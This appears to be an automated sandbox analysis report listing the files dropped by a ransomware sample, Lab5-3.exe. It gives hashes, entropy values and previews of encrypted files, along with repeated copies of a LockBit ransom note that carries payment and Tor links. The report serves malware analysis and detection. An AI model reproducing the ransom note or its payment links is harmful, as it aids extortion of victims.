                                                                                                          Preview:...',.Ya...gj_)..B...PaM.`.../\.s...M.X.Z...8....M.-..6.......dM.a.[.W..;..t*.D.?.Ha.J.....a...1.r.xf......it"..>..~....6H.-@....*G...E.Q....K.f.i...7....T$HTz...b4........B.M8.*;..&.!.....+d-<..=..l..%uR.N.5..+.+.:....'.VB...f.tw..H...{..O..Y....%...dy)..'5.M.....R...:i. .7......|._E.%.."..E..wt..'Kvn....\..u...d....s........W..<..\..H.....1.O..n......a...#..G....I=...R.UL..F...:.........i.\.w.|E.....DA.=.8e9{e$v.8l|h....:y&C...r.%....|^.....F ...\]&.._.r..C..{.....f.3;k'......|...t....Ya.5..r._.....&..(dw........+......]s.p.P.3eq....|.`.=.<.W,...tH(..0C......s..d.a.Z:.U.!Y7.Cno"....\?.1E.f.,.......z.W.O.>........E.s/u.2.u8.ac..@..zQ)..._.\do....y.0x.N"Eu...V.f.x.2.!h...TL.Q.A0.2...w}XX.v.........]..0..S.b.U.....?'i..f.5.......|.Q.%.2........l..l6.d.*...q..4>.p...n~4g.+..f.*o..#.......C[...w....8u#b'.1.tM.I....z.j.h_S....I.`..x.]7....x.Z.J..!gG.9...{y.......S21.C..T.+...Z."M.i.s.W..F.C>.HC.t6 .ux...B.....k... .M.?.cIw.....?@.C...L.$.....t6-.C.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3328
                                                                                                          Entropy (8bit):7.945964810370931
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9vCelLf1x1o6w8kKtxBlPXGx0uKeY2ElUJ:BnlxzosvlPE0Cb
                                                                                                          MD5:E62C73285A2E5AD3D3323FA71C206EF3
                                                                                                          SHA1:B159E59EAFFC0580007B84BB2501C21697E946B8
                                                                                                          SHA-256:11451E863301E9B1612D8243E0D2282321DADC9D41FB2B1E21FC0EF98F043353
                                                                                                          SHA-512:2ED26D1D0C35C3A741131EBEC0F792202921A7F5B75A65B16F4501FA829953E7B95CBA5C242A7CB8EDD9D287DCC679229AE624B2ABF21D0A614B1D8CA7A3E897
                                                                                                          Malicious:false
                                                                                                          Preview:Vs....X3 ..H...2...:.Y.......c...v....l....^aK.....9.....-.UC.h..fn3..R](.x.f....m.4._...1.M.X..V.Z(...D^P....{.g.I.....b.;L>....2..............O..YA.|..b@.Hr...\.:.g...qP....J...F._.}..i...K...q@.!...VeM@.........[..B....o...f5^Kh..Zl.k.......A.x....%......,J4...69.m.}.."...:..+...j.N..Av..38.....,..>.l...ZR...be......4.~IB.....LX....$U...$LH?u.T..o..4[......y.4...8..U....{....6.G.D.....c..(`>.PO.....wf..;.8e.0..7s%.n.>V.j.}.......}H..F...m....Y....+.d..|.....f.......(...d.91..H.O7..m..nJ.1...2.[..7./BrX.jUA.&.rAt{...?.&...E......C....y..a.cs...+.a..y..*{k](.Qm......1.Z...L..`..M.....\.O.I._..4.?..3TZ.....#Mu(D...;.+i&.x%.;.Ix..LS.K.t......r.a.n..s#.........A&.. [B............._+uf...iV....t.@I......Q........G./I.....Y..H....t..|.?.....&T|...c.%.U..O3....\.....?LJA.....m...."...go..g.......9..r...z...4M.<......5j.:MG.3rza.R...Y_...=..~.X...6..j..)n|...........p..`bHM.(..1U..$.=....e.U.2.(Rl.$(.p..Q.C~...m....`gS.J....YFL.>
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.922220123825538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KJ8o+iIUGXARgpPgQkvjQyDBk+QrYhlIHfUTid3hBaUoSGFcmeykEdEElU92i:KJ8oH0XA+JcpGx0uKeY2ElUJ
                                                                                                          MD5:38272338E4CB9A0E8DB2BD341779288E
                                                                                                          SHA1:2FDA30BB17E6339BFD97FDB3017B81CB5438E30D
                                                                                                          SHA-256:6920F42B74602250D676DB5EBA63C1EDD6DC228BB2A581486D5B166D4EB5CAF3
                                                                                                          SHA-512:DFF3F3BBEAEEA46B179D131ABDF3F016D9EE2392ED216BE33CA5F7CC76E97C8E3548315CCBFB5360D7E2D1BB4196C8B5837D6428311E35CD56D60A10498E2E18
                                                                                                          Malicious:false
                                                                                                          Preview:\..Xj.PY;dp..OP.W.T.l....?...l^.].....2'...H)$\...\OX..w%x4st.....PL....Y..u..K4gwF.+.......n.=..:O..K#.U......Z.}.;.J..o.../.<.T........../..D..0.....[..2..+w......p.>~.s..T7`......"9..j.......7H.......ngS.D_....d..b..dG.&n..`h.....z.E...&.+^.]..."z.;.....?....bEuK.y.P........-....Z[..4..%..F...%.i..:>._A..F.}.Z.}.........W$..7........E...G.).h....V.z,I..A..R%....+;.......}..@6..z.N...dM..5.t|.wQW....B.s...v~........V.|%L.....i...F.......".L..D.>..Z.J.o.&.3.....&~.XC.....#.K...q.y.lV....).ql{@F.....R'Y........"?..r3.t...E.L.o.....I....L......G..Q[i5.D*O...1....@A..{..)G;.J.(.}.._;.../.[.r.......U.%.C0.."..;...Wh@v.v.FuXKM.P^.*.tQ..=...V.B@....9=~.S.&W..1.3R...B|y.>|.....z...].....X..4....N..>.?....\.......1;\._4...}g?.2~...@..<..p....r.....c...........#^..L+.......Z{lBG....C...L.+...8"......K..%*..y..eJW..[.O.;>..A~..I....A....Z.AB0,......W..0...O.q.uV...2.Z....w~z.vq...%..<.`..EAD9...s.....?"...r....<.y%~n8.IZ.D...#.-....d..Qw
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:true
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.917118809197835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Y53AcMEvJOnaJ2o8EDhqp/1xWEGiEqo/HfUTid3hBaUoSGFcmeykEdEElU92i:CDxFR5hqR7WCEqXGx0uKeY2ElUJ
                                                                                                          MD5:720CCD582BEF54016CFCA0A1AEADC0D2
                                                                                                          SHA1:D338BF20544A47E2A06B0826FB11685684644B94
                                                                                                          SHA-256:98BB55DB98D60255A1AFFD4EBE491606C47E77C3D14995EEFE43A6BBD08A8CA4
                                                                                                          SHA-512:62ADB20CD7987528A484F442272882256F7639194E221879E878D7768C5E10E54B9CFC29905EA7ED0D9FE801161DD8F4F7515B934B24DA35BEE3BEC9BB4120DB
                                                                                                          Malicious:false
                                                                                                          Preview:..}.G&.|..:2_...?.......Y.'...J.J.z.@...{I.S.<v..l..2?.rY.... ue.\.q.8..+.E(.Q3.G....1v@.M..]...N..z}@y.d..:..'....I"..|6..2.:....J.".f.f..F.j.|J....\..U...7{...Zb.p.."k|...pm..GBz...r.....`.ig#c..7l.w.A.k..})...t......{...v.U...n.\...0...Hz...o..&$g....o/......?D.....7n..-.....7.%.d..VL...|....g...........6..B.....BT3..V..<..@R.z.6....(..r?{..]Gj..<.A5".DO..7w..".KUeU....o.H..[.l.......S....4"..L0../`.6.]....%...0#.........;..\.k..60C....V..-.8.l.._.....B.,3."O....xv....p....3.t.9....*....`,.&..L_Q.y-...;O..$.x.U.xrk.(.>.......U....K...w...#..vm.g...oQ...o...U..Y...z......f^.@..3....,...+.3Ap..:|.....M..3>./............S....q...D}..`.".W.u.B..@pd..@.b..Olq.....K.........+=y.N;5....31...R.h....}N...j.]....>.)T...X>....C...SL=../n(.D...7....f.G..e.2..q|...x+87..E....$...eN/..?.AQ.t...'.....).Va........Ru.....@=............u ......kN2.`n8.=.).~.B...`..DX.x...6....t..8K.#.q.X.y.}..hX...-..3.....(p!.&.?.:a.....v./.$Q.....@K.L..X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.916440941762824
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:gPMMXbUqGGtYTZJdTHfUTid3hBaUoSGFcmeykEdEElU92i:cZ+IAZTgGx0uKeY2ElUJ
                                                                                                          MD5:62B7D0415A15F6DCC76207948F6ADED1
                                                                                                          SHA1:C29DBE038D763A1599F313B0C6F12BC136700CDF
                                                                                                          SHA-256:DD9149FE044BA6019F6E8A2740727F41930797EAEE30BE5A681A44E0C5804D81
                                                                                                          SHA-512:D76DFF2E560E9ADA656EC90D340DC4259AD73F698CA6CE51DAC9AF1BB93DC35606AD415EBC5E199538C0F4401EA983EABAAF04BF7D937F4FF9F471C5002FAD57
                                                                                                          Malicious:false
                                                                                                          Preview:.4.....x-g3.......<.Y.pF$.z.5.....J......|..fk?.....nen...Pj....n.|...B.$.3.^z....n...c.NZ..X..d.p....I.F<"B..9j.....5.z^.*....&]....#r....si...^e.h./{.m.p.i...._Y.BWd...+..U...o.J........H^.V..,d.F../a...3.l=..Y*./%A\..".e'......Z(...$..V..s.y..;..t..l..Y.t2.do4..y[...t%O...S.r....iy.\-.p.xi......0.0..BJ...`....|'.w.y..z.#.._l.K.#.+..C.U.$w..9.g!s..w..l....&.c.>.......w.x.....pp....\{....p.9....*..w......^..h2t\./.mo2&...f........]N........dJ}........GT.]..O......3.$[+5.g...c...o)..7...."QNQ...<...iwT.....i.......5.....K.k^0e.Yk.9.......o.._.[..(..aQ..~f.8K.w..I..B3..V.`3oJ...#..........n..(c.._...'...D.Rf.a@....._U.$%.._.A.."|...F.....I.(....&i......|..&.V=h.......)...Z..o.8..`.....f.b.N.qY..j...z.i..k0R3"4.r5.<.Dn.wA..7....O..9..s..M&.m.6..uTn..{......8..c....X...Vh9.....>..<.R$..9.Y.....Y.O...-...}.......x...U47...>w..w..ZlU...x.!.[...."H..a-.".aR.V..NX<.E....Y.J.L[\d.....;. ..e&..}.`.G.C...#..tm> t....L..I{w..%..m....\....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.924645768027124
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qGTVrh8jmksFC98OGPXPU2HfUTid3hBaUoSGFcmeykEdEElU92i:qYrSjmLg98AGx0uKeY2ElUJ
                                                                                                          MD5:867544278B8A4C919BBD9A35A30900B9
                                                                                                          SHA1:FF1EDC0B6D55FF3AB9173AB2B1BC24400F88EF7E
                                                                                                          SHA-256:2E363CB79D9625C5BD0CEAADD744DA54043616A98B1DFD45C190C050307D726E
                                                                                                          SHA-512:B612BA9EBFBA1364E8F1A333498D9BAA1AEC15307E141F993CE6C90F76B149AEDCBA724A627877583E33E35BD8D5B89CF3E395589A57525F153CB50C0B47F5CE
                                                                                                          Malicious:false
                                                                                                          Preview:<E...,}.+.B.d..H........v...;!.a.'.e...c.@.....[yMC._Tk.....n]|..qt..kx...h..[j..{M...y.........x.'w....4c.g-.y.$.8'`6..<2.......r.e.F,...j..&..n......^h.....J.;.P.E..-hM...dLCM.J.d....V.fk.......i.S..f..g..&.j.4j.(.._..F3.9-.C.Y.....P...0].f.$.?....F.$.B../.%.v........a..y....[..N.N'..8..i...8_......j.O..'............:.....y~m<....L.:.....o].Uk^.M....b..#..Pm>...YP ..e\h'.j..L..$.:K..................:..4....,.Eg.\.......Q..X..7...[....9.^h..JG.J........R`L..k..H...Sc.d.....-...K.."h[.y...............|...q.l7.n..0u.f.r..J.w.Fkm4.M9.2C.....k.V...........~."..uW....D.....0.~LK.6..W....P..Q..Qq5c.....s.|.....$...g.ec..WN.....Kb.H..j........./y.....C......-.....:.U.GM..m.CtmX..$.^.".u.o@...bt.j...+.......@.x.^.N..>VGr..U..7....b...K....^w.4...|...GI..GNKYH...h....Wo.......K..|...bo..'OSf.].I..*I..U<.'.M...Oe]0&.5.9....m.....r..Q$._.*y.S.....A\`...a...y... c.c0..G0.|.va........Pq8&...."-..9."...a0......Q...nfz..[...O2./L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.931601149523505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1K4KTGSsjzzUcdWXaz6CRsvzFobHfUTid3hBaUoSGFcmeykEdEElU92i:1KvSYpKz6zeoGx0uKeY2ElUJ
                                                                                                          MD5:D4FC60EAF473E548C314376C61428D44
                                                                                                          SHA1:147BAA2C3139E0649B2EF1E958A3F4B47A17DC72
                                                                                                          SHA-256:076361911FBA112DFDF43ED1836CA41186E1769B3E640F19941421C41E0BA7A7
                                                                                                          SHA-512:A1ABB45160A3FD602FD7A03D684A60909670BBF422A567A956F179D5638FE463B7B26D90A5E9A4D5227F6D784558D76F70FC0EBAFCA6026D3041DF392D61C1E4
                                                                                                          Malicious:false
                                                                                                          Preview:@M.|Cw[...$.j.2.^%.Bx..}..A..........\V..y..4....._GUc\T....#./...pc.u..Y...o.0.."4\...]......K. ..`...j.......'"$.`.F....zv..E...|^...'g....sS.x......!....FV@.d.P.......B.A@.e_G.!dM..~t..l...j..D.O.....?....P.,..&...|T....h<..P.....y..<...Z.......u.Ee.j....|p.x X...3p..f......R..;....6.n.d...p.%.P.5.F>....q.T.A.{..$r.l./...9..5&..".....U4 ....f.O\v&.Hm.9g.{F.lE.phP.<...k.7.n....G.O.E.8U....]9i...0.z.\.+....2.y....<..p_%...Tn.....K.3x)9RD=...`Y........./B.......K.tD...h.>..C"?y...5..e...Qnr.v..N.4..2.<..+M.^.r..:..n%-......9......=.<*P..^.>O.~6..r.@..{.........q.6.v..C.4~.h.H..@.tZ~'}....e.t....I9.9.2.4..lx....,D.j.%...[.I.x..-o....ey.1...]@.&....T....?.n3`!....;......cE..z........bG......h.V.{(...K..8..=.-Z.......0...Z.........$..1N...).......>.A..T..\..F......<..L...D..A....Z..4mo.a..<B.?A.i._v..kiy.n..PA.4O>.f.'.T.b....k.(!N....6V.....A....1..\D.?L...dk.*u.."..*.....8|n....M.r9&|......'..P...Z.K..!)...c..e..s2%.fe.q1......^...RV...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
